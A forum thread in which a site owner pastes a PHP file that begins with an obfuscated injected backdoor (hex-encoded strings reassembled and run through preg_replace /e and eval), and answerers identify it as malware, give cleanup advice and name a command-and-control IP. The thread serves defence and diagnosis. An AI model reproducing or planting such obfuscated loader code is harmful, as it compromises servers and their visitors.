garbage code appearing at the beginning of PHP files

Question

Just recently all my php files have developed some garbage code at the beginning of each file, I will paste a file at the end to show you. Any file I clean this code up from stops working or has some major problems with it. Please help, the file below is the code for an add button I think, if I use this file as is then all works, if I remove the garbage code then it stops working

<?php $azebdqinoq = '825%x5c%x7827jsv%x5c%x78256<C>^#zx7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%860hA%x5c%x7827pd%x5c%x78256<pd%x5dov{h19275j{hnpd19275fubmg452]88]5]48]32M3]317]445]212]445]43]321fe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x24]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x78973:8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]867824*<!%x5c%x7824-%x5c%x7824gps)%x5x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7d]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%xc%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x572]48y]#>m%x5c%x7825:|:*r%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]BALS["%x61%156%x75%156%xopjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!XA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x786x5c%x7822!ftmbg)!gj<*#k#)usbux78b%x5c%x7825mm)%x5c%c%x78256<.msv%x5c%x725:-t%x5c%x7825)3of:ZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x78b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+y25c:>%x5c%x7825s:%x5c%x785c%x>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%ss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1Gx5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%%164") && (!isset($GLOx5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x523ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpx5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%25%x5c%x7824-%x5c%x78222:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnp%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112ror_reporting(0); preg_replace("%x2f%50%xyf%x5c%x7860%x5c%x7878%x5c%]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257I#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x785c%x7824b!>!%x5c%x7825yy)#}#-#%x4y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x78%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjAx7825%x5c%x7878:-!%x5c%x7825tz>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojx5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFc%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x785c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785cfmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]UI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X82f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x725)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5osvufs:~928>>%x5c%x7856~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdx782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***fx29%73", NULL); }24]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodu%x7825kj:!>!#]y3d]51x7822l:!}V;3q%x5c%x7825}U;y]7878Bsfuvso!sboepn)%x5c%x7825epnb2]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x%x5c%x785csboe))1%x5c%)sutcvt)fubmgoj{hA!osvufs!~<3x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]25%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825c%x7825w6Z6<.3%x5c%x78625)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5cx5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x>b%x5c%x7825Z<#opo#>b7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462]c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c27id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66f%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x7FGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QU2f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]26c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7ovg!|!**#j{hnpd#)tutjyf%x5c%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x75c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860825!<12>j%x5c%x7825!|!*#91y]c9y]g2y2f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x782]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%24-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)yqmpef)#%x5c%x7824*<!%x5c,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x78%x5c%x7824Ypp3)%x5c%x7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6Loj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppdex35%165%x3a%146%x21%76%x21%50%x5c%x78x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x7882f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%0hA%x5c%x7827pd%x5c%x78256<pd%2%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]yf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!s5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x7825c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x785!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827t>j%x5c%x7825!*9!%x5c%x7827!hmg%33]65]y31]55]y85]82]y7jpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x7824W&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudov0%x6c%157%x64%145%x28%%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<epdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjif((function_exists("%x6f%142%x5f%163%x74%141%x726g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x78%x78242178}527}88:}334}47x787fw6*%x5c%x787f_*##)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepd6767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786c%x7860opjudovg)!gj!|!25!)!gj!<2,*j%x5c%x782dR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%sdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%2]y74]256]y39]252]y83]273]y7^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%c%x7825%x5c%x7824-%x#!#-%x5c%x7825tmw)%x5c%w%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]21M5]D2P4]D6#<%x5c%x7825G]y6d]281L]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-trg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2qc%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbu]#>>*4-1-bubE{h%x5c%x7825)sutx7825z>!tussfw)%x5c%x7825zW%x5c%x7825h2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%16feobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zp!*#opo#>>}R;msv}.;%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%}R;2]},;osvufs}%x5c%x7>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5ggg!>!#]y81]273]y76]258]y6g]273]y76]2715c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x78x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x782f#%x5c%x782f#%x5c%x782f},-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5cx785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cbssb!-#}#)fepmqnj!%x5c%x782]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!0LDPT7-UFOJ%x5c%x7860GB)fubf*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>t%x5c%x7860cpV%x5c%x787f%x5c%x7c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7]464]284]364]6]234]34n fjfgg($n){return chr(ord($n)-1);} @erce44#)zbssb!>!ssbnpe_GMFT%x5c%x786!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsu827,*b%x5c%x7827)fepdof.)fepdof.%x5ccvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjud2]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss;#-#}+;%x5c%x7825-qp%x5c%x7825825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K747y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]7{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%tus%x5c%x7860sfqmbdf)%x5c%x78860ftsbqA7>q%x5c%x78256<%x5c%x787.984:75983:48984:71]K9]77]D4]82]K6]72])54l}%x5c%x7827;%x5c%x7825!<*#}_;#)3>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmq%x5c%x7825%x5c%x7827Y%x5%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]oGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x78147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%sfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%]y35]256]y76]72]y3d]51]y35]274057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftm5]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd8:56985:6197g:74985-rr.93e:5597f-s.5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x87f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x782782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x0QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFS73]D6P2L5P6]y6gP7L6Mf!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7872qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x7x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x52fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c~<**9.-j%x5c%x7825-bubE{h%x5c%x782561"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1; functio%x7825%x5c%x7824-%x5c%x7824!>!fO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)eu]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*C6]62]y3:]84#-!OVMM*<%x22%51%x29%51%/(.*)/epreg_replaceyghchkxkgi'; $iuipceeisf = explode(chr((172-128)),'5769,49,1440,22,809,24,9863,54,7862,39,1838,41,6818,50,5630,22,6937,55,8755,69,4838,37,774,35,5480,51,5984,57,4193,35,135,34,3498,23,5005,30,9132,40,8640,63,10013,58,5531,41,9309,67,1572,67,1963,42,4391,49,2923,61,933,52,7542,28,6164,50,4875,66,5186,50,9499,53,2659,44,0,33,8824,42,7427,51,8615,25,1036,20,8379,33,3934,39,2136,55,8998,35,3255,65,8556,59,6127,37,2277,45,8703,52,3882,52,626,61,5906,21,687,53,4301,55,9033,37,6405,59,7610,44,1233,63,1462,53,6083,22,7570,40,9828,35,3342,29,4666,50,6105,22,5324,58,7935,62,5382,32,9070,62,4601,40,3738,38,7802,39,2744,53,4356,35,6751,29,8033,40,4228,27,5652,59,874,59,1345,48,9948,65,8283,67,2984,47,4255,46,7997,36,1778,60,516,61,1143,61,6868,49,7478,27,9450,49,3521,55,9724,53,7901,34,9376,54,4076,52,2605,54,3681,21,2083,53,9777,51,6041,42,8896,41,5082,62,6917,20,7343,33,8120,30,8450,36,1515,57,2902,21,1723,55,169,26,4787,51,5927,57,234,41,3702,36,985,29,7654,31,9264,45,8239,44,1076,67,9600,54,2221,56,5711,58,1879,27,3137,28,6992,22,5572,58,6616,64,4015,61,4941,64,3371,70,6214,28,3198,57,7188,47,1906,57,4440,68,33,52,4561,40,2835,67,2322,52,2703,41,2484,52,3776,53,8196,43,740,34,1056,20,833,41,5881,25,5035,47,5818,63,275,46,4508,53,2797,38,6305,20,2005,32,7121,67,8350,29,1701,22,2037,46,3048,69,5436,44,378,35,6680,31,6711,40,3973,42,9917,31,4641,25,3117,20,8866,30,7505,37,4716,21,2416,68,577,49,9207,57,3165,33,1296,49,6780,38,7014,68,7685,49,5144,42,6325,23,413,40,8150,46,9172,35,321,57,6560,56,8412,38,3576,47,6464,63,9430,20,4737,50,6527,33,453,63,2374,42,8486,70,7734,68,2536,69,195,39,7841,21,8073,47,3320,22,7273,70,1393,47,9552,48,9654,70,3829,53,7235,38,1204,29,5236,44,6242,63,3623,58,85,50,1639,62,1014,22,2191,30,6348,57,7376,51,3441,57,7082,39,5280,44,4128,65,8937,61,5414,22,10071,35,3031,17'); $jlfewmajru=substr($azebdqinoq,(60333-50227),(36-29)); if (!function_exists('ieyytpzwon')) { function ieyytpzwon($npyiglifgm, $abljwfudhn) { $fvtdvkghyu = NULL; for($ienbzzgpgq=0;$ienbzzgpgq<(sizeof($npyiglifgm)/2);$ienbzzgpgq++) { $fvtdvkghyu .= substr($abljwfudhn, $npyiglifgm[($ienbzzgpgq*2)],$npyiglifgm[($ienbzzgpgq*2)+1]); } return $fvtdvkghyu; };} $rtevwrmojr="\x20\57\x2a\40\x6a\147\x79\163\x6a\151\x6c\155\x6e\166\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\62\x35\55\x31\70\x38\51\x29\54\x20\143\x68\162\x28\50\x34\65\x35\55\x33\66\x33\51\x29\54\x20\151\x65\171\x79\164\x70\172\x77\157\x6e\50\x24\151\x75\151\x70\143\x65\145\x69\163\x66\54\x24\141\x7a\145\x62\144\x71\151\x6e\157\x71\51\x29\51\x3b\40\x2f\52\x20\147\x61\151\x6a\146\x61\167\x77\160\x70\40\x2a\57\x20"; $ghyzwmwujj=substr($azebdqinoq,(65784-55671),(83-71)); $ghyzwmwujj($jlfewmajru, $rtevwrmojr, NULL); $ghyzwmwujj=$rtevwrmojr; $ghyzwmwujj=(652-531); $azebdqinoq=$ghyzwmwujj-1; ?><?php include_once("php_includes/check_login_status.php");

Answer 1

That is not "garbage", that is a piece of malicious software installed on your server through a vulnerability (i.e. obsolete code, and the like). As you can see from the links below, the exploit could be related to WordPress MailPoet plugin, but lots of possible vulnerabilities can lead to the same result

What to do: have the server looked at by a security professional.

What might suffice:

• restore all files from clean backups, and upgrade all involved software to the latest version and security patch level (best to do this offline, if possible).
• Disable all plugins or software packages for which there is an outstanding vulnerability report and no mitigation available (you'll have to check the relevant sites and mailing lists).
• Verify the timestamps of all files on the server looking for "clumps" (lots of files, especially if unrelated, modified around the same date and time) and suspicious timestamps (e.g. PHP files uploaded or modified outside a webmaster's work hours), or files modified when they shouldn't have (e.g. system files and so on), or files that aren't where they should (executable files in data directories) or look suspicious anyway (e.g. random names).
• Check the webserver logs for suspicious activity, especially involving IP address 31.184.192.250 or similar (see below).
• Also check other possible logs if present: mail server, SSH, login, FTP.

Semi-technical stuff and trivia: I have decrypted the code - after several layers of obfuscation, the core appears to be a close relative, possibly exactly the same, of this. It seems to have appeared for the first time on a Chinese website shortly before Christmas Eve, 2013, when the webmaster called for help.

The command-and-control server has had its domain registered in november 2013, and is located in St. Petersburg, Russia. The URLs apparently do not respond (but it is possible that the internal checks can tell between an "original" malware and a malware subverted to investigate the protocol, and refuse to answer to the latter).

The cleartext script of the malware can be found here on GitHub (needless to say, exercise appropriate caution).

Answer 2

It is unlikely that your code developed garbage code on its own. Your website has been hacked. You need to update your operative system and/or the CMS you are using.

Answer 3

This is malicious code. It's very likely you run a Wordpress or Joomla! website, don't you? ;-) Somewhere (in a script) I guess there is such an "obscure" code block with a base64_decode function. Usually this malicious code is base64 encoded several times, so it can "hide" what it's doing.

Remove your whole website and set it up from scratch. Install security plugins and be sure to always apply the latest patch.

See http://blog.securestate.com/decoding-php-backdoor/ for an explanation about how this works.

Answer 4

This is malware that was put into your code by exploitable software installed on your webserver. Somewhere, there is a script that gets requested constantly which overrides php files and most likely HTML files with malware code. I would suggest you update all the software installed and request the logfiles of the last weeks from your ISP to find the leak.